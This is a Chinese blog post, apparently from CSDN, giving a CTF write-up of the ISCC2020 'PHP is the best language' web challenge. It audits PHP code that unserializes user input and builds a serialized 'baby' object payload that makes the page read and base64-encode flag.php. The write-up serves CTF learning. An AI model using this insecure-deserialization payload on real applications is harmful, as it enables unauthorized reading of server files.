ISCC2020-PHP is the best language

最新推荐文章于 2024-06-25 16:03:30 发布
最新推荐文章于 2024-06-25 16:03:30 发布
阅读量1k 收藏 1
点赞数 2
分类专栏: PHP反序列化 文章标签: php php反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gd_9988/article/details/105965230
版权

ISCC2020-PHP is the best language

这也算是我第一次成功做出来一道PHP反序列化的题目了,在此记录一下。以前看到这种题目看一眼就放弃了,根本看不懂,现在也算是入了个门吧,也不再畏惧这类题目了。那么话不多说,开始淦。

<?php  
@error_reporting(1);
include 'flag.php';
class baby 
{
    public $file;
    function __toString()      
    {
        if(isset($this->file))
        {
            $filename = "./{$this->file}";
            if (base64_encode(file_get_contents($filename)))
            {
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}
if (isset($_GET['data']))
{
    $data = $_GET['data'];
        $good = unserialize($data);
        echo $good;
}
else 
{
    $url='./index.php';
}

$html='';
if(isset($_POST['test'])){
    $s = $_POST['test'];
    $html.="<p>谢谢参与!</p>";
}
?>

看上去代码很多,很多新手比如我就已经选择放弃了,其实仔细一看,也不是很难,看这个类

<?php
class baby 
{
    public $file;
    function __toString()      
    {
        if(isset($this->file))
        {
            $filename = "./{$this->file}";
            if (base64_encode(file_get_contents($filename)))
            {
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}
?>

这里审计一波,如果这个类里面的file变量已经设置,就满足条件,file_get_contents函数可以读取文件的内容(把整个文件读入一个字符串中),然后base64编码输出。而这里是定义了一个魔术方法
__toString(当echo变量时会调用这个方法)
这里我们再看源代码的一段

if (isset($_GET['data']))
{
    $data = $_GET['data'];
        $good = unserialize($data);
        echo $good;
}

这里我们的思路就很清晰了,要读取flag.php中的内容,则使$file变量为flag.php,然后进行序列化。最后使用GET方法传递参数data,这里的payload为:

<?php  
class baby 
{
    public $file;
    function __toString()      
    {
        if(isset($this->file))
        {
            $filename = "./{$this->file}";
            if (base64_encode(file_get_contents($filename)))
            {
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}
$a = new baby();
$a->file='flag.php';
echo serialize($a);
?>

序列化的结果为:

O:4:"baby":1:{s:4:"file";s:8:"flag.php";}

故最终payload为:

/?data=O:4:"baby":1:{s:4:"file";s:8:"flag.php";}

得到一串base64,解码得flag

Rocl5
关注
专栏目录
Php_is_the_best_language-[ISCC2020]-[本地复现]
qwsn
11-22 1703
0x01、Web类 1.Php_is_the_best_language-[ISCC2020]-[本地复现] 第一步:代码审计 <?php @error_reporting(1); //运行时遇到致命的错误,停止执行脚本 include 'flag.php'; //提示当前目录下有一个flag.php class baby //类:baby { public $file; //公有属性:$file function __toString(
ISCC2020-Web题解
Lemon's blog
05-27 2206
神秘组织的邮件-2 点击提交数字会发生改变,因为这次的赛制有一个关联,通过上一题 得出的flag是加键乘除,又提示要联系起来,就想起了之前做有一道秋名山车神那道题,只不过这个题需要将运算符手动添加,脚本如下: import requests from bs4 import BeautifulSoup import re import time if __name__ == '__main__': time_start=time.time() url = 'http://101.201.126
ISCC2020部分wp
Atkx's Blog
07-10 846
1. LSB 下载压缩包,解压得到一个图片 用Stegsolve打开,进行异或 在通道为0时发现了异常 将所有通道设为0,然后保存为flag.png 打开图片,发现是二维码 扫描后得到cumtctf{1sb_i4_s0_Ea4y} 2.
iscc2020WEB题WP
qq_44060093的博客
05-26 1274
web4 打开题目,没啥发现,抓包看一下 一看到Cookie: token=,应该是伪造jwt
Confidence-2020-Web-Writeup
郁离歌丶的博客
05-08 988
Confidence-2020-Web-Writeup [toc] Cat web 首先是看到可以列几个图片,点一下下拉框是一个无参数?直接带内容的url http://catweb.zajebistyc.tf/?grey 然后有一个report功能,这个应该是无回显的ssrf了,一般有另外一个xss的点,思路其实比较清晰,如果是xss的话那么那里可以x呢,回到刚刚的链接 看一下html源码,发现有一个接口 <html> <head> <title>My ca
2021-05 ISCC竞赛
m0_53146110的博客
05-23 4852
2021-05 ISCC 练武题 这ISCC比赛,还是参加的以一个网络安全方面的竞赛,会的东西不多,碰运气的成分有不少。这里写几个已经解出来的题目。
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip是一个与ISCC(International Symposium on Computer Science and Convergence,国际计算机科学与融合大会)相关的压缩包文件。这个压缩包可能包含了该会议的多份论文、研究报告或者竞赛...
ISCC-2020-J07
03-26
【标题】"ISCC-2020-J07"是一个可能代表某个IT竞赛或项目的标识符,可能是2020年ISCC(International Symposium on Computer and Communication)的一部分,分类为J07,这通常意味着它属于特定的技术或研究领域。...
ISCC-2020-J06
02-14
标题“ISCC-2020-J06”可能指的是一个特定的项目、研究或活动,其中“ISCC”可能是“International Symposium on Computer and Communication”的缩写,这可能是一个关于计算机与通信领域的国际研讨会。而“2020”则...
ISCC2023全国大学生网络信息安全竞赛
qq_57423018的博客
06-08 5119
信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越容易遭受攻击,遭受攻击的后果越严重。“网络安全和信息化是一体之两翼、驱动之双轮。没有网络安全就没有国家安全。”信息是社会发展的重要战略资源,国际上围绕信息的获取、使用和控制的斗争愈演愈烈,信息安全保障能力是综合国力、经济竞争实力和生存能力的重要组成部分,是世纪之交世界各国奋力攀登的至高点。
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
网鼎2020-朱雀组.rar
05-24
网鼎2020-朱雀组.rar除了web题
ISCC2024--pwn
最新发布
qq_74259765的博客
06-25 741
ISCC2024部分pwn题目wp
ISCC2021 美人计
sky_original的博客
04-23 485
打开zip,在ny4w1nbmry4m\word\media这个路径下找到两张二维码。得到密钥:ISCC2021 了解到加密方式有AES。使用QR Research分别扫描得到以下两段码。得知第一段是DES加密,解码后得到flag。PK开头说明被强制转换过,原来是zip。有一个文档和黑寡妇图片。第二段是AES加密,连续三次解码后得到。用010 Editor打开黑寡妇图片。之后用010 Editor打开文档。说明美人的话不可全信啊。注意:不可换行提交!
ISCC-2022
ki10Moc的博客
06-06 4042
pyccwp
ISCC2020部分MISC总结
qwzf
05-29 3512
前言 这次ISCC,不得不说杂项题脑洞真大(脑袋坑太少,就做出了几道),并且没有Crypto题。但Web题目难度还行(不容易的题,主要是涉及脑洞),这里先总结一下做出来的MISC题,另起一篇总结Web题。 MISC1:ISCC签到 题目难度:简单 考察:图片高度+维吉尼亚密码 在winhex里改图片高度,得到 然后进行维吉尼亚密码解密,并且很容易想到密钥是high MISC2:寻找小明-1 题目难度:普通 考察:Stegsolve+使用cv2库 cv2模块使用 参考: CV2模块使用(详细教程) 模块cv
ISCC-2020-WEB-What can images do-writep
Bcdlbgm的博客
05-31 342
WEB What can images do(文件包含+文件上传) 其实序列号也做出来了,没有立马写后来就忘了。当时立马写wp的只有这个一个。 题目:http://101.201.126.95:7004/ 可以看到有个filename,参数是文件名。可以试试包含 ../../../../etc/passwd 成功但是不知道后台是include还是file_get_content。(这两者是有区别的可以参考这里,(链接11)) 然后我们再尝试一下php文件,可以看到包含了。那么就是include。 然
ISCC2018(最新的考核解析)
落花四月
05-10 7037
最近一直在做这个 ISCC2018,感觉可能自己只是一个新手吧!但是我会继续努力的,希望我的解题思路能够给你们带来一定的想法,我也希望自己能够在安全方面遇到更多志同道合的人! 1 导入一个文本中,然后使用ASCII码表一一对比进行解密 解题思路:首先需要把附件下载下来,然后放在winhex中就会看见有ASCII码,使用ASCII码表进行转换,就会得到最终的Unicode编码,进行解密...
Re | 首次遇见符号修复 gmp库
BadRer的博客
04-17 802
前言 第一次遇见符号修复,于是就记录下来了。 分析 首先拿到题目,emmm,全是IDA无法识别的函数,而且函数表特别多,说明程序去除了符号表,并且使用的是静态链接。所以需要手动修复符号表。全局搜索字符串可以看到gmp字样,猜测是使用了gmp的静态库。(当然可以使用nm ldd 等命令来进行查看) 获取gmp的静态库 网上搜索了一番没找到现成的静态库,所以只能字节编译了。 按着...
2019 ISCC CTF挑战:代码审计解密PHP脚本
在2019年信息安全挑战大会(ISCC)的CTF安全比赛中,有一道相对简单的题目,题目名为"2019ISCC writeup"。这道题目属于代码审计类别,主要考察参赛者对PHP函数的理解和利用,特别是涉及到的缺陷或特性分析。挑战者需要...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值